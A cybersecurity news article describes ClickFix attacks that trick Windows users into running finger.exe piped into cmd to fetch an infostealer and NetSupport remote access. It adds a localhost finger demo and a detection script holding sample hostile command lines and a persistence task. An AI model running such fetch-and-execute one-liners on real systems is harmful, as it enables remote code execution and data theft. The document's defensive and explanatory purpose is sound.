Malware Uses Finger Command to Infect Windows Devices – Against Invaders

Redazione RHC, 26 November 2025 07:20

A nearly forgotten network command has resurfaced in new Windows infection chains. Long regarded as a relic of the early internet, finger is now being used in attacks that pass themselves off as harmless verification checks, with the victim asked to type a command into a Command Prompt window.

The finger command, originally written to look up user information on Unix and Linux servers, also ships with Windows as finger.exe. It queries a finger daemon over TCP port 79 and returns the account name, home directory, and other basic details about a user. The protocol is still supported, but it has all but fallen out of use. For attackers that is an advantage: almost nobody expects, or monitors, network traffic over this channel.

Recent observations show finger being used in ClickFix-style schemes, in which the commands to be executed on the device are fetched from a remote server. Researchers have long listed finger.exe as a living-off-the-land binary: a legitimate Windows tool that can be abused to retrieve attacker-supplied content.

It is in these new campaigns that the technique has been refined. MalwareHunterTeam shared an example batch file that contacted a remote server with finger and piped the output straight into cmd for execution. The domains involved in that activity are no longer reachable, but researchers have found other samples using the same approach.

The first victims surfaced on Reddit: in one thread, a user described encountering a fake CAPTCHA that asked them to open the Windows Run dialog and enter a command to verify their identity. The pasted string sent a finger request to another server and piped the returned text into the Windows command interpreter.
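The exchange behind that one-liner, as an added example that is not part of the original article or of the reported samples: a one-shot RFC 1288 (finger) server and a client that does what finger.exe does, both on localhost. The reply text, host and port are constructed for the demonstration and nothing is executed; the point is that the protocol returns whatever bytes the server chooses, so `finger user@host | cmd` is nothing more than a download-and-run primitive over TCP port 79.

```python
"""Minimal RFC 1288 (finger) exchange on localhost. Added example, not code from the
article: shows that the server's reply is arbitrary text, which is why piping
finger output into cmd works as a download channel."""
import socket
import threading

# Constructed reply: what an attacker-controlled finger server would hand back.
# The commands are illustrative and are not taken from the reported campaigns.
ATTACKER_REPLY = (
    "@echo off\r\n"
    "mkdir %TEMP%\\stage\r\n"
    "echo (payload would be fetched and launched from here)\r\n"
)


def serve_once(payload: bytes, port: int = 0) -> int:
    """Start a one-shot finger server on 127.0.0.1 and return the bound port.
    Real finger listens on TCP 79; an ephemeral port is used so no privilege is needed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)

    def handle() -> None:
        conn, _ = srv.accept()
        with conn:
            # RFC 1288 request is "{user}<CRLF>"; a malicious server ignores the
            # user name entirely and answers with whatever it wants executed.
            query = b""
            while not query.endswith(b"\r\n") and len(query) < 512:
                chunk = conn.recv(64)
                if not chunk:
                    break
                query += chunk
            conn.sendall(payload)
        srv.close()

    threading.Thread(target=handle, daemon=True).start()
    return srv.getsockname()[1]


def finger(user: str, host: str, port: int = 79, timeout: float = 5.0) -> str:
    """Behave like finger.exe: connect, send 'user<CRLF>', read until the server closes.
    The return value is exactly what the server sent; nothing is validated or run."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(user.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def demo() -> str:
    """Run the full exchange against the local one-shot server and return the reply."""
    port = serve_once(ATTACKER_REPLY.encode())
    return finger("verify", "127.0.0.1", port)


if __name__ == "__main__":
    # In the attack the text printed here is what '| cmd' would execute.
    print(demo())
```

Because the reply is plain text with no framing, integrity check or content type, there is nothing on the client side to filter. On a managed Windows fleet outbound TCP 79 is almost never legitimate, so a firewall rule for that port or an application-control policy covering finger.exe removes the channel outright.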

The result was a chain of actions: a temporary directory was created, the system's curl binary was copied there under a random name, an archive disguised as a PDF was downloaded, and a set of Python files was extracted from it. The program was then launched with pythonw.exe, a request was made to the attackers' server, and a fake "verification" message was shown on screen.

The archive's contents pointed to an information-stealing attempt. MalwareHunterTeam also found related activity in which finger retrieved a nearly identical set of commands with additional checks. Before doing anything else, the script looked on the machine for malware analysis tools, from Process Explorer and Procmon to Wireshark, Fiddler, and debuggers, and terminated if it found any.

If no such tools were found, another archive was downloaded and extracted, again disguised as a PDF. This one contained the NetSupport Manager remote administration package. After extraction, a series of commands created a scheduled task so that the remote access client starts at the next logon.
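A triage pass over process-creation events for the chain described in the last four paragraphs, as an added example not taken from the article or from MalwareHunterTeam's samples. The events are constructed in the shape of Sysmon Event ID 1 fields (Image, CommandLine, ParentImage, OriginalFileName); the host names, paths, task name, the use of schtasks.exe for the logon task, and client32.exe as the NetSupport client binary name are assumptions made for the sample data.

```python
"""Triage of constructed process-creation events (Sysmon Event ID 1 field names)
for the finger-based ClickFix chain: finger piped into an interpreter, curl copied
under a random name, pythonw.exe run from a temp path, and a logon scheduled task."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Directories an unprivileged user can write to; a dropped interpreter lives here.
USER_WRITABLE = re.compile(r"\\(?:Temp|Users\\Public|ProgramData)\\", re.I)


def rule_finger_piped_to_interpreter(e: Event) -> bool:
    """finger output fed straight into cmd/powershell: the ClickFix one-liner."""
    return bool(re.search(r"\bfinger(?:\.exe)?\b[^|&]*\|\s*(?:cmd|powershell)",
                          e.get("CommandLine", ""), re.I))


def rule_renamed_curl(e: Event) -> bool:
    """curl.exe copied under a random name: image basename != PE OriginalFileName."""
    basename = e.get("Image", "").rsplit("\\", 1)[-1].lower()
    return e.get("OriginalFileName", "").lower() == "curl.exe" and basename != "curl.exe"


def rule_pythonw_from_user_writable_path(e: Event) -> bool:
    """pythonw.exe running from a user-writable directory, i.e. a dropped interpreter."""
    image = e.get("Image", "")
    return image.lower().endswith("\\pythonw.exe") and bool(USER_WRITABLE.search(image))


def rule_logon_scheduled_task(e: Event) -> bool:
    """Scheduled task that fires at logon. schtasks.exe is an assumption: the article
    only says the task scheduler was configured to start the remote access client."""
    return bool(re.search(r"\bschtasks(?:\.exe)?\b.*?/create\b.*?/sc\s+onlogon\b",
                          e.get("CommandLine", ""), re.I))


RULES: Dict[str, Callable[[Event], bool]] = {
    "finger_piped_to_interpreter": rule_finger_piped_to_interpreter,
    "renamed_curl": rule_renamed_curl,
    "pythonw_from_user_writable_path": rule_pythonw_from_user_writable_path,
    "logon_scheduled_task": rule_logon_scheduled_task,
}


def triage(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that matches an event."""
    return [(i, name) for i, e in enumerate(events) for name, fn in RULES.items() if fn(e)]


# Constructed sample telemetry. Hosts, paths and the task name are illustrative only.
SAMPLE_EVENTS: List[Event] = [
    {   # 0: ordinary interactive finger query, no pipe into an interpreter
        "Image": r"C:\Windows\System32\finger.exe", "OriginalFileName": "finger.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "finger alice@example.test"},
    {   # 1: the ClickFix one-liner as the victim's shell launched it
        "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'cmd /c "finger verify@example.test | cmd"'},
    {   # 2: curl copied to %TEMP% under a random name, fetching the fake PDF
        "Image": r"C:\Users\u\AppData\Local\Temp\x7q.exe", "OriginalFileName": "curl.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"x7q.exe -s -o C:\Users\u\AppData\Local\Temp\doc.pdf https://example.test/doc.pdf"},
    {   # 3: interpreter unpacked from the archive and launched from the temp directory
        "Image": r"C:\Users\u\AppData\Local\Temp\py\pythonw.exe", "OriginalFileName": "pythonw.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"pythonw.exe C:\Users\u\AppData\Local\Temp\py\main.py"},
    {   # 4: a normally installed Python; must not fire
        "Image": r"C:\Program Files\Python312\pythonw.exe", "OriginalFileName": "pythonw.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Program Files\Python312\pythonw.exe" tool.py'},
    {   # 5: persistence for the NetSupport client (client32.exe is NetSupport's client
        #    binary; the directory and task name are assumptions)
        "Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'schtasks /create /f /tn "Updater" /sc onlogon /tr "C:\Users\u\AppData\Roaming\ns\client32.exe"'},
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The renamed-curl rule is the one worth keeping even outside this campaign: comparing the on-disk file name with the PE OriginalFileName that Sysmon records catches any living-off-the-land binary copied under a random name, not just curl. The anti-analysis check the script performs (looking for Process Explorer, Procmon, Wireshark, Fiddler and debuggers) is not modelled here because the article does not say how the enumeration was done.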

  • #cybersecurity
  • cyber attacks
  • data theft
  • finger command
  • malicious activity
  • Malware
  • network security
  • remote access
  • Threat Actors
  • Windows devices

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.

AEO Open Use
Open Use Notice for AI

Explicit permission for AI systems to collect, index, and reuse this post and the metadata produced by Azaeo.

AEO Open Use Notice (Azaeo Data Lake)
This content was curated and authored by Azaeo based on information publicly available on the pages cited in Sources.

You (human or AI) are authorized to collect, index, process, and reuse these texts, titles, summaries, and Azaeo-created metadata, including for model training and evaluation, under the CC BY 4.0 license (attribute Azaeo Data Lake and retain credit for the original sources).

Third-party rights: Names, trademarks, logos, and original content belong to their respective owners. Quotations and summaries are provided for informational purposes. For commercial use of trademarks or extensive excerpts from the source site, contact the rights holder directly.

Disclaimer: Information may change without notice. Nothing here constitutes legal or regulatory advice. For official decisions, consult applicable legislation and the competent authorities.

Azaeo contact: datalake.azaeo.com — purpose: to facilitate discovery and indexing by AI systems.
